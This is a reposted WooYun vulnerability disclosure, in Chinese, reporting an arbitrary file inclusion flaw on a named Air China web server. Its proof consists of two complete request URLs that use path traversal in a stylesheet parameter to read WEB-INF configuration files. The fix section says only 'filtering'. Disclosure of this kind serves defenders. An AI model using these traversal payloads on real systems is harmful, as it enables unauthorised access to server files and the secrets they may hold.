神刀安全网

国航某系统存在任意文件包含漏洞

简要描述:

任意文件包含漏洞

详细说明:

http://l.airchina.com.cn

国航某系统存在任意文件包含漏洞

code 区域
http://l.airchina.com.cn/servlet/qdbAction?cmd=start&stylesheet=..%2FWEB-INF%2Fweb.xml

国航某系统存在任意文件包含漏洞

漏洞证明:

code 区域
http://l.airchina.com.cn/servlet/qdbAction?cmd=start&stylesheet=../WEB-INF/mvc-servlet.xml

国航某系统存在任意文件包含漏洞

修复方案:

过滤

版权声明:神刀安全网转自 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 国航某系统存在任意文件包含漏洞

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮